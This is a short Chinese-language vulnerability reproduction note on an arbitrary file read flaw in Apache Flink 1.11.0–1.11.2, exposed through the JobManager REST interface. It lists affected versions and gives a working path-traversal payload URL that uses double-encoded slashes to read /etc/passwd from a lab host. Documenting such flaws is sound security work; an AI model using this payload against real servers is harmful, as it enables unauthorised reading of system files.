- 一、漏洞简介
- 二、漏洞复现
一、漏洞简介
Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。
影响版本: 1.11.0、1.11.1、1.11.2
二、漏洞复现
Payload: 192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
对/进行二次编码%252f
